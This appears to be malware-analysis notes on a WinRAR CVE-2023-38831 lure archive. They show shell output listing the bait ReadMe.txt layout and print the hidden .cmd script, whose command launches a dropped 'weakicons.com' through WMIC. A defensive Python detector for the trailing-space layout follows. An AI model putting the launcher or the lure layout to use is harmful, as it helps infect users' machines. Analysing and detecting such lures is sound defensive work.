Article with details on the vulnerability, its malicious use, and file hashes: https://www.group-ib.com/blog/cve-2023-38831-winrar-zero-day/
File: 049af32f678da5e344315ce46787e8fc
Anyrun: https://app.any.run/tasks/3c2f3ff4-3883-4f68-98d1-706138771f46
remnux@remnux:~/Downloads$ md5sum malware.rar
a519226ff8e4edd6d622db45a0099932 malware.rar
remnux@remnux:~/Downloads$ 7z l malware.rar |grep -v ico
7-Zip [64] 16.02 : Copyright (c) 1999-2016 Igor Pavlov : 2016-05-21
p7zip Version 16.02 (locale=en_US.UTF-8,Utf16=on,HugeFiles=on,64 bits,2 CPUs Intel(R) Core(TM) i7-4770HQ CPU @ 2.20GHz (40661),ASM,AES-NI)
Scanning the drive for archives:
1 file, 1821500 bytes (1779 KiB)
Listing archive: malware.rar
--
Path = malware.rar
Type = zip
Physical Size = 1821500
Date Time Attr Size Compressed Name
------------------- ----- ------------ ------------ ------------------------
2023-06-21 14:24:26 ....A 3994 177 ReadMe.txt
2023-06-21 07:26:58 D.... 0 0 ReadMe.txt
2023-07-02 06:53:45 ....A 135 118 ReadMe.txt /ReadMe.txt .cmd.
------------------- ----- ------------ ------------ ------------------------
2023-07-02 06:53:45 2035675 1803266 102 files, 1 folders
remnux@remnux:~/Downloads$ 7z e malware.rar *cmd* -r -ooutput
7-Zip [64] 16.02 : Copyright (c) 1999-2016 Igor Pavlov : 2016-05-21
p7zip Version 16.02 (locale=en_US.UTF-8,Utf16=on,HugeFiles=on,64 bits,2 CPUs Intel(R) Core(TM) i7-4770HQ CPU @ 2.20GHz (40661),ASM,AES-NI)
Scanning the drive for archives:
1 file, 1821500 bytes (1779 KiB)
Extracting archive: malware.rar
--
Path = malware.rar
Type = zip
Physical Size = 1821500
Everything is Ok
Size: 135
Compressed: 1821500
remnux@remnux:~/Downloads$ ls output/
'ReadMe.txt .cmd. '
remnux@remnux:~/Downloads$ cat output/ReadMe.txt\ .cmd.\
start "" /min cmd.exe /k "cd %TEMP% && for /F "delims=" %%G in ('dir /b /s "weakicons.com"') do WMIC process call create "%%~G" & exit"
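The listing above shows the CVE-2023-38831 lure layout: a benign-looking file (ReadMe.txt), a directory with the same name plus a trailing space, and inside that directory a script whose name is the bait name plus a space and an executable extension. The `7z l` output hides the trailing space, which is why the two "ReadMe.txt" rows look identical. The following Python script, an added detection example that is not part of the original notes or of the Group-IB writeup, reads the raw entry names from a ZIP archive and flags that pattern; the executable-extension list and the in-memory sample archive are constructed assumptions, and the sample's script body is a harmless placeholder rather than the payload shown above.

```python
import io
import posixpath
import zipfile

# Assumed list of extensions that Windows will execute on double-click.
EXEC_EXTS = {".cmd", ".bat", ".exe", ".vbs", ".js", ".ps1", ".scr", ".com"}


def find_spoofed_entries(names):
    """Return (bait_file, payload_path) pairs for the CVE-2023-38831 lure layout.

    names: ZIP entry names exactly as stored ('/' separators, directories end with '/').
    A hit requires three things: a directory whose name ends in whitespace, a file
    entry whose path equals that directory name with the whitespace removed (the bait),
    and a child of the directory whose stem is the bait name followed by whitespace
    and whose extension is executable.
    """
    files, dirs = set(), set()
    for name in names:
        if name.endswith("/"):
            dirs.add(name.rstrip("/"))
        else:
            files.add(name)
            parent = posixpath.dirname(name)
            if parent:                      # implicit directory entries count too
                dirs.add(parent)

    findings = []
    for d in sorted(dirs):
        bait = d.rstrip(" ")
        if bait == d or bait not in files:  # no trailing space, or no same-named bait file
            continue
        bait_base = posixpath.basename(bait)
        for f in sorted(files):
            if posixpath.dirname(f) != d:
                continue
            # Windows silently drops trailing dots and spaces from file names,
            # so "ReadMe.txt .cmd." is treated as "ReadMe.txt .cmd".
            child = posixpath.basename(f).rstrip(" .")
            stem, ext = posixpath.splitext(child)
            if stem.rstrip(" ") == bait_base and ext.lower() in EXEC_EXTS:
                findings.append((bait, f))
    return findings


def scan_zip_bytes(data):
    """Scan an in-memory ZIP archive; namelist() preserves trailing whitespace."""
    with zipfile.ZipFile(io.BytesIO(data)) as zf:
        return find_spoofed_entries(zf.namelist())


def build_sample_archive():
    """Constructed sample reproducing the layout from the listing (placeholder contents)."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as zf:
        zf.writestr("ReadMe.txt", "Sample document body (constructed).")
        zf.writestr("ReadMe.txt /", "")                       # note the trailing space
        zf.writestr("ReadMe.txt /ReadMe.txt .cmd", "echo placeholder, not a payload")
        zf.writestr("icons/app.ico", "placeholder bytes")
    return buf.getvalue()


if __name__ == "__main__":
    for bait, payload in scan_zip_bytes(build_sample_archive()):
        print(f"SUSPICIOUS: bait {bait!r} paired with executable {payload!r}")
```

Run it against a real archive with `scan_zip_bytes(open(path, "rb").read())`; the sample in the notes identifies itself as a ZIP despite the .rar name, so `zipfile` applies. Because the check works on stored names rather than the rendered listing, the trailing space that `7z l` and WinRAR hide is exactly what triggers the match.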